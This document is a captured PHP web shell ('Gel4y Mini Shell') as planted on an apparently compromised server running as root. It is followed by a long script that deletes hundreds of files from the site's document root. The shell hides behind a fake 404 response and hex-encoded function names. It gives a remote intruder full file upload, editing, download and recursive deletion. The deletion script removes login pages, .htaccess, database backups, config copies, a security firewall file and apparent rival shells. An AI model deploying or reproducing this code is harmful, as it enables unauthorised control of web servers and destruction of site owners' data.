| Server IP : 14.225.204.176 / Your IP : 216.73.216.169 Web Server : nginx/1.24.0 System : Linux nodejs-ybgk 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 User : root ( 0) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/php/home-services/public/ |
Upload File : |
<?php
echo "<span id='anjing' style='display:none;'>".dirname(__FILE__)."</span>";
echo "<span id='bangsat' style='display:none;'>".$_SERVER["SCRIPT_NAME"]."</span>";
?>
<?php error_reporting(0); http_response_code(404); define("self", "G\x65l\64y M\x69n\x69 Sh\x65ll"); $scD = "s\x63\x61\x6e\x64\x69r"; $func = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); for ($i = 0; $i < count($func); $i++) { $func[$i] = nhx($func[$i]); } if (isset($_GET["p"])) { $p = nhx($_GET["p"]); $func[3](nhx($_GET["p"])); } else { $p = $func[2](); } function hex($str) { $r = ""; for ($i = 0; $i < strlen($str); $i++) { $r .= dechex(ord($str[$i])); } return $r; } function nhx($str) { $r = ""; $len = (strlen($str) -1); for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i+1])); } return $r; } function perms($f) { $p = fileperms($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); return $i; } function a($msg, $sts = 1, $loc = "") { global $p; $status = (($sts == 1) ? "success" : "error"); echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>"; } function deldir($d) { global $func; if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return; if ($func[6]($d)) { array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($d); } else { unlink($d); } } ?> <!doctype html> <!-- RandsX aka T1kus_g0t --> <html lang="en"> <head> <meta name="theme-color" content="red"> <meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"> <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <title><?= self ?></title> <style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style> <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script> </head> <body style="background-color:#000;color:#fff;font-family:serif;"> <div class="bg-dark table-responsive text-light border"> <div class="d-flex justify-content-between p-1"> <div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div> <div> <span>PHP Version : <?= $func[1]() ?></span> <br> <a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a> <a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a> </div> </div> <div class="border-top table-responsive"> <li>Server : <?= "{$_SERVER["SERVER_NAME"]} ({$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]})" ?></li> </div> <form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form> <?php if (isset($_FILES["f"])) { $n = $_FILES["f"]["name"]; for ($i = 0; $i < count($n); $i++) { if ($func[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) { a("file uploaded successfully"); } else { a("file failed to upload", 0); } } } if (isset($_GET["download"])) { header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: ".$func[17](nhx($_GET["n"]))); header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\""); } ?> </div> <div class="bg-dark border table-responsive-sm mt-2"> <div class="ml-2" style="font-size:18px;"> <span>Path: </span> <?php $ps = $func[4]("/(\\\|\/)/", $p); foreach ($ps as $k => $v) { if ($k == 0 && $v == "") { echo "<a href=\"?p=2f\">~</a>/"; continue; } if ($v == "") continue; echo "<a href=\"?p="; for ($i = 0; $i <= $k; $i++) { echo hex($ps[$i]); if ($i != $k) echo "2f"; } echo "\">{$v}</a>/"; } ?> </div> </div> <article class="bg-dark border table-responsive-sm mt-2"> <?php if (!isset($_GET["a"])): ?> <table class="table table-hover table-bordered table-sm"> <thead class="text-light"> <tr> <th>Name</th> <th>Size</th> <th>Permission</th> <th>Action</th> </tr> </thead> <tbody class="text-light"> <?php $scD = $func[5]($scD($p), [".", ".."]); foreach ($scD as $d) { if (!$func[6]("$p/$d")) continue; echo " <tr> <td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$func[19]("Y-m-d H:i", $func[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td> <td>N/A</td> <td><font color=\"".(($func[8]("$p/$d")) ? "#00ff00" : (!$func[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td> <td> <a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a> </td> </tr>"; } foreach ($scD as $f) { if (!$func[7]("$p/$f")) continue; $size = $func[10]("$p/$f")/1024; $size = round($size, 3); $size = ($size > 1024) ? round($size/1024, 2)."MB" : $size."KB"; echo " <tr> <td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$func[19]("Y-m-d H:i", $func[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td> <td>{$size}</td> <td><font color=\"".(($func[8]("$p/$f")) ? "#00ff00" : (!$func[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td> <td> <div class=\"d-flex justify-content-between\"> <a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a> <a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a> </div> </td> </tr> "; } ?> </tbody> </table> <?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?> <div class="px-2 py-2"> <?php if ($a == "delete") { $loc = $p.'/'.nhx($_GET["n"]); if ($_GET["t"] == "d") { deldir($loc); if (!$func[12]($loc)) { a("folder deleted successfully"); } else { a("failed to delete the folder", 0); } } if ($_GET["t"] == "f") { $loc = $p.'/'.nhx($_GET["n"]); unlink($loc); if (!$func[12]($loc)) { a("file deleted successfully"); } else { a("file to delete the folder", 0); } } } ?> <?php if ($a == "newDir"): ?> <h5 class="border p-1 mb-3">New folder</h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($func[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($func[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?> <h5 class="border p-1 mb-3">New file</h5> <form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($func[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($func[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?> <h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($func[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?> <h5 class="border p-1 mb-3">Edit file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $func[18]($func[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($func[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?> <h5 class="border p-1 mb-3">View file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $func[18]($func[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div> <?php endif; ?> </div> <?php endif; ?> </article> <div class="bg-dark border text-center mt-2"> <small>Copyright © 2021 - Powered By Indonesian Darknet</small> </div> <script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script> <script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script> <script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script> <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script> </body> </html>
<?php
$os = $_SERVER["DOCUMENT_ROOT"]."/";
$a = unlink($os."wp-login.php");
$b = unlink($os."xmlrpc.php");
$c = unlink($os.".tmb");
$d = unlink($os.".htaccess_old");
$e = unlink($os."sa.php");
$f = unlink($os."wp-update.php");
$g = unlink($os."wp-content/plugins/wp-file-manager/");
$h = unlink($os."cgi-bin");
$i = unlink($os.".well-known");
$j = unlink($os."about.php");
$k = unlink($os."error_log");
$l = unlink($os."dead.letter");
$m = unlink($os.".litespeed_flag");
$n = unlink($os.".hcflag");
$o = unlink($os.".rnd");
$p = unlink($os."vzh.txt");
$q = unlink($os."wp-aa.php");
$r = unlink($os."404.html");
$s = unlink($os.".user.ini");
$t = unlink($os."502.html");
$u = unlink($os."eae.txt");
$v = unlink($os."ss.php");
$w = unlink($os."jlc.txt");
$x = unlink($os.".htaccess.bk");
$y = unlink($os."bykont.php");
$z = unlink($os.".ftpquota");
$aa = unlink($os.".htaccess.ovh.old");
$ab = unlink($os.".ftp-deploy-sync-state.json");
$ac = unlink($os.".ftpquota");
$ad = unlink($os."wp-content/plugins/educationhub-connector.zip");
$ae = unlink($os."wp-content/plugins/edurp-customizations.zip");
$af = unlink($os.".user.ini.zip");
$ag = unlink($os."php.ini.zip");
$ah = unlink($os."siteguarding_tools.php");
$ai = unlink($os."test-01.html");
$aj = unlink($os."wp-content/Farila_debug.log");
$ak = unlink($os."wp-content/Jibran_debug.log");
$al = unlink($os."wp-content/Naveed_debug.log");
$am = unlink($os."wp-content/debug.log");
$an = unlink($os."wp-content/mu-plugins-live.zip");
$ao = unlink($os."wp-content/stratus-child-live.zip");
$ap = unlink($os."wp-content/upgrade-live.zip");
$aq = unlink($os."wp-content/upgrade-temp-backup-live.zip");
$ar = unlink($os."wp-content/advanced-cache.php");
$as = unlink($os."--.htaccess.backup");
$at = unlink($os.".DS_Store");
$au = unlink($os."gel4y.php");
$av = unlink($os."mlr.php");
$aw = unlink($os."we2.php");
$ax = unlink($os."wp-content/.DS_Store");
$ay = unlink($os."web.config");
$az = unlink($os."web.config.bkup261220240316");
$ba = unlink($os."ipn_main_handler.php");
$bb = unlink($os."xilapay.php");
$bc = unlink($os."object-cache.php");
$bd = unlink($os."itespeed.conf");
$be = unlink($os."wordpress-6.5.5.zip");
$bf = unlink($os."wp-content/autoptimize_404_handler.php");
$bg = unlink($os."wp-content/plugins/buddyboss-theme-child.zip");
$bh = unlink($os."wp-content/plugins/buddyboss-theme.zip");
$bi = unlink($os."wordpress.zip");
$bk = unlink($os."server.txt");
$bl = unlink($os."archiv.zip");
$bm = unlink($os."olvasdel.html");
$bn = unlink($os."licenc.txt");
$bo = unlink($os."wp-content/object-cache.php");
$bp = unlink($os."21_11.zip");
$bq = unlink($os."lenstom.zip");
$br = unlink($os."s.php");
$bs = unlink($os."name.zip");
$bt = unlink($os."filespack.json");
$bu = unlink($os."index-old.php");
$bv = unlink($os."wp-content/maintenance.php");
$bw = unlink($os."wp-logo.png");
$bx = unlink($os.".gitignore");
$by = unlink($os.".well-known.zip");
$bz = unlink($os."wsoq2.php");
$ca = unlink($os."xaydung.zip");
$cb = unlink($os.".maintenance");
$cc = unlink($os.".heroku-wp");
$cd = unlink($os.".php-ini");
$ce = unlink($os.".php-version");
$cf = unlink($os.".gitlab-ci.yml");
$cg = unlink($os."docker-compose.yml");
$ch = unlink($os."Dockerfile");
$ci = unlink($os."wordpress-6.7.1-fa_IR.zip");
$cj = unlink($os."wordpress-6.7.1.zip");
$ck = unlink($os.".htacess");
$cl = unlink($os.".wp-config.php.swp");
$cm = unlink($os.".litespeed_conf.dat");
$cn = unlink($os."custom_debug.log");
$co = unlink($os."functions.sh");
$cp = unlink($os."tuan.txt");
$cq = unlink($os."wp-content/.wp-content.php");
$cr = unlink($os."deleteme.wp01fc31c15aae4ee4968b3e4e31f2713d.php");
$cs = unlink($os."deleteme.wpae5cf84cd85a44bf979bbb3d6096893c.php");
$ct = unlink($os."deleteme.wpb7ceb6596ac44a7180d447139750c4c6.php");
$cu = unlink($os."deleteme.wpd91930bb33474468b37f9c8633fb8be7.php");
$cv = unlink($os.".well-known");
$cw = unlink($os."49757c4f");
$cx = unlink($os.".htaccess.preinstall");
$cz = unlink($os."wp-cli.yml");
$da = unlink($os."index.html.backup.74b292efe29cf0ab2dcabbf95022b033");
$db = unlink($os."index.html.backup");
$dc = unlink($os."whitespacefix.php");
$dd = unlink($os."oanNoMmbbU.txt");
$de = unlink($os."nginx.conf");
$df = unlink($os."backup.sql");
$dg = unlink($os.".wordpress.php");
$dh = unlink($os.".htaccess.backup");
$di = unlink($os."wordpress-db-backup.sql");
$stoexf = unlink($os."wp-content/plugins/custom-logo-url.php");
$ibjxkx = unlink($os."advanced-cache.php-old");
$cepnhx = unlink($os."advanced-cache.php-old-old");
$xojrks = unlink($os."db.php-old");
$nubnmr = unlink($os."db.php-old-old");
$ghrtdt = unlink($os."index.php-old");
$bkvbgn = unlink($os."object-cache.php-old");
$sjlyon = unlink($os."object-cache.php-old-old");
$sjlyoo = unlink($os."shopnodhar_backup.zip");
$sjlyop = unlink($os."copy.php");
$sjlyoq = unlink($os."6-10-1403.zip");
$sjlyos = unlink($os."malcare-waf.php");
$sjlyot = unlink($os."wp-content/.litespeed_conf.dat");
$sjlyou = unlink($os."wp-content/1.pid");
$sjlyov = unlink($os."ioxi.php");
$sjlyow = unlink($os."ulc6.php");
$sjlyox = unlink($os."byp.php");
$sjlyoz = unlink($os."composer.json");
$sjlypa = unlink($os."wp-cli.phar");
$sjlypb = unlink($os.".ovhconfig");
$sjlypc = unlink($os."ioxi-o.php");
$sjlypd = unlink($os.".hta");
$sjlype = unlink($os."wp.php");
$sjlypf = unlink($os."wp-content/plugins/autoload_classmap.php");
$sjlypg = unlink($os."wp-content/themes/chosen.php");
$sjlyph = unlink($os."OneSignalSDKUpdaterWorker.js");
$sjlypi = unlink($os."employee_details.zip");
$sjlypj = unlink($os."lakkars-shoppy-3.mp4");
$sjlypk = unlink($os."pwa-manifest.json");
$sjlypl = unlink($os."pwa-register-sw.js");
$sjlypm = unlink($os."pwa-sw.js");
$sjlypn = unlink($os."sherly-vlogs.mp4");
$sjlypo = unlink($os."pwa-amp-sw.js");
$sjlypp = unlink($os."wp-content/index.php-old");
$sjlypq = unlink($os."README.md");
$sjlypr = unlink($os."composer.lock");
$sjlyps = unlink($os."section-html.html");
$sjlypt = unlink($os."logo.png");
$sjlypu = unlink($os.".htaccess.wpt-backup");
$sjlypv = unlink($os."BingSiteAuth.xml");
$sjlypw = unlink($os."favicon.ico");
$sjlypx = unlink($os."n-favicon.ico");
$sjlypy = unlink($os."seobilityverify_9206358.html");
$sjlypz = unlink($os."sitemap.xml.gz");
$sjlyqa = unlink($os."wp-config-20241112.php");
$sjlyqb = unlink($os."index.html_");
$sjlyqc = unlink($os."shoyo.php");
$sjlyqd = unlink($os."store.php");
$sjlyqe = unlink($os."local-xdebuginfo.php");
$sjlyqf = unlink($os."wp-content/plugins/duplicator-pro.tar.gz");
$sjlyqg = unlink($os."wp-content/plugins/plugins.tar_clinox.gz");
$sjlyqh = unlink($os."wp-content/themes/clinox.tar.gz");
$sjlyqi = unlink($os."law-ta.zip");
$sjlyqj = unlink($os."kayan2.zip");
$sjlyqk = unlink($os."ixu.txt");
$sjlyql = unlink($os."wp-content/1cfotqX8Dgp.php");
$sjlyqm = unlink($os."wp-content/SrxMVFnN97Z.php");
$sjlyqn = unlink($os."wp-content/plugins/yluflwmslz/f35.php");
$sjlyqo = unlink($os."wp-content/plugins/yluflwmslz/index.php");
$sjlyqp = unlink($os."wp-content/plugins/yluflwmslz/up.php");
$sjlyqq = unlink($os."archive_241227_100028.zip");
$sjlyqr = unlink($os."7g-gridpane.php");
$sjlyqs = unlink($os."ajp.txt");
$sjlyqt = unlink($os."file.php");
$sjlyqu = unlink($os."mar.php");
$sjlyqv = unlink($os."wp-content/aiBYWFgXU9q.php");
$sjlyqw = unlink($os."wp-content/jwzunXvEbmc.php");
$sjlyqx = unlink($os."wp-content/plugins/ubh/FMailer-zp47i.php");
$sjlyqy = unlink($os."wp-content/plugins/ubh/con.php");
$sjlyqz = unlink($os."wp-content/plugins/ubh/f35.php");
$sjlyra = unlink($os."wp-content/plugins/ubh/index.php");
$sjlyrb = unlink($os."wp-content/plugins/ubh/ubh.php");
$sjlyrc = unlink($os."wp-content/plugins/ubh/up.php");
$sjlyrd = unlink($os."wp-content/plugins/lholluerpf/index.php");
$sjlyre = unlink($os."wp-content/plugins/lholluerpf/up.php");
$sjlyrf = unlink($os."1ka0lo3p.php");
$sjlyrg = unlink($os."6409ven");
$sjlyrh = unlink($os."779F7D677BF7C53A8A78A183B392EFAC.txt");
$sjlyri = unlink($os."admin-ajax.php");
$sjlyrj = unlink($os."c48f8d5cceadbbad42edbf7ee3599a8e.avi");
$sjlyrk = unlink($os."infosect_infosec.sql");
$sjlyrm = unlink($os."wp-content/error_log");
$sjlyrn = unlink($os."wp-content/plugins/HiQmU.js.php");
$sjlyro = unlink($os."wp-content/plugins/error_log");
$sjlyrp = unlink($os."wp-content/plugins/pv/pv.php");
$sjlyrq = unlink($os."web.config.220424175344.orig");
$sjlyrr = unlink($os."dup-wp-config-arc__f826094-02134049.txt");
$sjlyrs = unlink($os."dup-installer-bootlog__4d92f9b-02134049.txt");
$sjlyrt = unlink($os.".htaccess.220424175344.orig");
$sjlyru = unlink($os.".htaccess.200123215539.orig");
$xoxjkk = unlink($os.".wpdb.sql");
$wepeuo = unlink($os.".sitepack.tar");
$sscfsm = unlink($os.".php.ini1");
$jybmov = unlink($os.".old-wp-config.php");
$ejznmy = unlink($os.".eaec73ab.js");
$rpdbww = unlink($os.".contents.php");
$gpktvu = unlink($os.".admin.php");
$xvlnfb = unlink($os."..user.ini1");
$xvlnfbb = unlink($os."..user.ini1");
$iexsfi = unlink($os."..htaccess12");
$iexsfii = unlink($os.".htaccess12");
$iexsfj = unlink($os."access_log.log");
$iexsfk = unlink($os."adminer.php");
$iexsfl = unlink($os."error_log.log");
$iexsfm = unlink($os."discount.php");
$iexsfn = unlink($os."hhm.png");
$iexsfo = unlink($os."auto_install.json");
$iexsfp = unlink($os."cjdetails.php");
$iexsfq = unlink($os."listNew.php");
$iexsfr = unlink($os."list.php");
$iexsfs = unlink($os."Locoy.php");
$iexsft = unlink($os."latest.tar.gz");
$gukumq = unlink($os."FTmetSXBrrow");
$jmnuug = unlink($os."live.sql");
$dmasxp = unlink($os."live.sql.gz");
$bujulh = unlink($os."options.php");
$avllwk = unlink($os."profile.php");
$eclrhj = unlink($os."rsync-wordpress.sh");
$dkryrp = unlink($os."themes.php");
$rciwwm = unlink($os."tXzUmawBjcfx");
$aeyhgs = unlink($os."wp-admin.php");
$dstpom = unlink($os."wp-ver.php");
$uzqyxn = unlink($os."wp-recovery.php");
$hwunso = unlink($os."wp-option.php");
$hwunsp = unlink($os."ixu.txt");
$hwunsq = unlink($os."Adds.php");
$hwunsr = unlink($os."wordpress-6.7-vi.zip");
$hwunss = unlink($os."readurl.php");
$hwunst = unlink($os."Latest.zip");
$hwunsu = unlink($os."JIfqNUvL.php");
$hwunsv = unlink($os."wp-content/plugins/nqsnroo3/Butl.js.php");
$hwunsw = unlink($os."wp-content/plugins/nqsnroo3/error_log");
$hwunsx = unlink($os."wp-content/plugins/ozxpgphuvj/js.php");
$hwunsy = unlink($os."wp-content/plugins/ozxpgphuvj/ozxpgphuvj.php");
$hwunsz = unlink($os."wp-content/plugins/ozxpgphuvj/style.php");
$hwunta = unlink($os."wp-content/plugins/ozxpgphuvj/readme.txt");
$hwuntb = unlink($os.".user.ini_old");
$hwuntc = unlink($os."chosen.php");
$hwuntd = unlink($os."woodmart-theme-pet-land-demo.zip");
$hwunte = unlink($os."sm.php");
$hwuntf = unlink($os."screenshot.jpg");
$hwuntg = unlink($os."123.php");
$hwunth = unlink($os."admin.php");
$hwunti = unlink($os."silentqie.php");
$hwuntj = unlink($os."silentrwm.php");
$hwuntk = unlink($os."wp-content/RzkM2xrfWwa.php");
$hwuntl = unlink($os."400.shtml");
$hwuntm = unlink($os."401.shtml");
$hwuntn = unlink($os."403.shtml");
$hwunto = unlink($os."404.shtml");
$hwuntp = unlink($os."413.shtml");
$hwuntq = unlink($os."500.shtml");
$hwuntr = unlink($os."cp_errordocument.shtml");
$hwunts = unlink($os."package-lock.json");
$hwuntt = unlink($os.".htacces");
$hwuntu = unlink($os."baxa1.php7");
$hwuntv = unlink($os."wp.cron.php");
$hwuntw = unlink($os."litespeed.conf");
$hwuntx = unlink($os."wp-content/uploads.zip");
$hwunty = unlink($os."wp-content/index.php");
$hwuntz = unlink($os."wp-content/style-css.php");
$hwunua = unlink($os."style-css.php");
$hwunub = unlink($os."wp-content/plugins/diablooqt/diablooqt.php");
$hwunuc = unlink($os."wp-content/background-errors.log");
$hwunud = unlink($os."wp-content/index.html");
$hwunue = unlink($os."tmpls.php");
$hwunuf = unlink($os."logo-02.png");
$hwunug = unlink($os."reset.php");
$hwunuh = unlink($os."hex.php");
$hwunui = unlink($os."info.php");
$hwunuj = unlink($os."amazon.php");
$hwunuk = unlink($os."shadow.php");
$hwunul = unlink($os."cls.php");
$hwunum = unlink($os."dwle.php");
$hwunun = unlink($os."ulc.php");
$hfhgar = unlink($os.".htbmny");
$lkkfhr = unlink($os.".htpouh");
$sfwset = unlink($os."gwp.php");
$xuewin = unlink($os."wp-auto-2.php");
$uxnxwe = unlink($os."htaccess.th");
$sqtrxf = unlink($os."text.php");
$rgylnj = unlink($os.".hta");
$qefedb = unlink($os."wp-lxbgek.php");
$lmiuju = unlink($os."wp-mzpear.php");
$vzyxfh = unlink($os."wp-eoxoyy.php");
$ujqcbw = unlink($os."sale.php");
$wovogk = unlink($os."wp-22.php");
$plzkrj = unlink($os."zp8.php");
$iotnpm = unlink($os."login.php");
$iotnpn = unlink($os."wp-content/wp-blog-header.php");
$iotnpo = unlink($os."wp-content/wp-cron.php");
$iotnpp = unlink($os.".tmp");
$iotnpq = unlink($os."khuyen.js");
$iotnpr = unlink($os."khuyen.php");
$iotnps = unlink($os."yc.php");
$iotnpt = unlink($os."wp-content/wp-cache-config.php");
$iotnpu = unlink($os.".htaccess_swift_backup");
$iotnpv = unlink($os.".htaccess.zip");
$iotnpw = unlink($os."flushpermalinks.php");
$iotnpx = unlink($os."wp_install.log");
$iotnpy = unlink($os."taxi111111.zip");
$iotnpz = unlink($os."nginx.htaccess");
$iotnqa = unlink($os."test.php");
$iotnqb = unlink($os."index.txt");
$iotnqc = unlink($os."sitemap.php.php.tar.gz");
$iotnqd = unlink($os."sitemap.php.tar");
$iotnqe = unlink($os."wp-admins.php");
$iotnqf = unlink($os."wp-content/wf-licensing.log");
$iotnqg = unlink($os."wp-content/siteground-migrator.log");
$iotnqh = unlink($os."a.html");
$iotnqi = unlink($os.".htaccess22");
$iotnqj = unlink($os.".htaccess333");
$iotnqk = unlink($os."wp-content/backup-migration-config.php");
$iotnql = unlink($os."wp-content/mysql.sql");
$iotnqm = unlink($os."mysql.sql");
$iotnqo = unlink($os."t.php");
$iotnqp = unlink($os."up.php");
$iotnqq = unlink($os."wp-content/sgs_encrypt_key.php");
$iotnqr = unlink($os."sync.php");
$iotnqs = unlink($os."script_remove_images_gallery.php");
$iotnqt = unlink($os."liesmich.html");
$iotnqu = unlink($os."LICENSE.txt");
$iotnqv = unlink($os."wp-content/object-cache.php.bk");
$iotnqx = unlink($os."maintenance.php");
$iotnqy = unlink($os."ahkamu.php");
$iotnqz = unlink($os."error_log.php");
$iotnra = unlink($os."wordpress-6.6.zip");
$iotnrb = unlink($os.".htaccess.old");
$iotnrc = unlink($os.".htaccess1");
$iotnrd = unlink($os."php.ini1");
$iotnre = unlink($os."wp-content/advanced-cache-backup.php");
$iotnrf = unlink($os."page-user-login.php");
$iotnrg = unlink($os."wp-settings.php.bk.copy");
$iotnrh = unlink($os."favicon.gif");
$iotnri = unlink($os."nomi.php");
$iotnrj = unlink($os."u.php");
$iotnrk = unlink($os."deploy_php_tpl.sh");
$iotnrl = unlink($os."1.php");
$iotnrm = unlink($os.".project");
$iotnrn = unlink($os."default_page.png");
$iotnro = unlink($os."cek.php");
$iotnrp = unlink($os."blacklist.txt");
$iotnrq = unlink($os."008.php");
$iotnrr = unlink($os."astrom.php");
$iotnrs = unlink($os."0d.php");
